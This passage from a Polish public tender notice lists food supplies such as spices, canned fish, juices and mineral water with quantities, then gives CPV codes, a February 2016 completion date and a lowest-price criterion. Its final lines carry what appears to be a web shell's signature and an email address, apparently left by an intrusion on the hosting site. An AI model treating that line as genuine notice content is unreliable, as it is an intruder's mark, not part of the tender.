Szt

15
Musztarda sarepska 210g
szt

180
Ocet spirytusowy 10% 500ml
szt

60
Ogórki konserwowe słoik 870g
szt

260
Oregano 200g
Szt

1
Olej rzepakowy 1l
szt

400
Pomidory suszone 314ml
Szt

30
Papryka słodka mielona 500g Knorr lub równoważna
szt

5
Paprykarz szczeciński 330g
szt

120
Pieprz naturalny mielony 500g
szt

20
Pieprz ziołowy 20g
szt

25
Pieprz ziołowy 500g
Szt

1
Płatki śniadaniowe kuleczki czekoladowe 1kg
szt

40
Płatki owsiane 500g
szt

60
Płatki śniadaniowe kukurydziane 1kg
szt

70
Proszek do pieczenia 32g
szt

150
Przyprawa curry 25g
szt

30
Przyprawa do gyrosa 500g
szt

7
Przyprawa do grilla 500g
szt

5
Przyprawa do mięsa 700g Knorr lub równoważna
szt

20
Przyprawa do flaków Appetita 25g lub równoważna
szt

30
Przyprawa do zup w płynie 860ml Delikat lub równoważna
szt

60
Ryż długoziarnisty
kg

200
Soda oczyszczona 20g
szt

25
Soczki marchwiowo-owocowe 330ml 
Szt

2600
Sok pomidorowy 330ml
Szt

160
Sos sałatkowy 700g
szt

10
Sól drobnoziarnista 
kg

300
Sól ziołowa 30g
szt

25
Słodzik 1200 tabletek
szt

20
Syrop owocowy 5l
szt

120
Szpinak mrożony 2,5kg
szt

160
Szprot w oleju 170g
szt

150
Szprot w pomidorach 170g
szt

80
Makrela  w pomidorach 170g
szt

900
Śmietana w proszku Śnieżka 60g lub równoważna
szt

45
Tymianek 10g
szt

30
Tuńczyk w sosie własnym 185g
szt

100
Truskawki mrożone 2,5kg
szt

80
Talarki ziemniaczane mrożone 
Kg

35
Wiórki kokosowe 200g
szt

20
Wiśnie mrożone 2,5kg
szt

6
Wafelek w czekoladzie 50g
szt

300
Wafle śmietankowe 2,5kg
szt

4
Warzywa na patelnie mrożone 2,5kg
Szt

15
Woda mineralna 1,5l gaz
szt

340
Woda mineralna n/gaz 1,5l
szt

600
Woda mineralna n/gaz 5l
Szt

100
Zając czekoladowy 16g
szt

100
Ziele angielskie 300g
szt

10
Ziele angielskie 1kg
Szt

1
Żelatyna spożywcza 50g
szt

5
Żurek staropolski 500ml
szt

200
Żurawina suszona 200g
Szt

7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com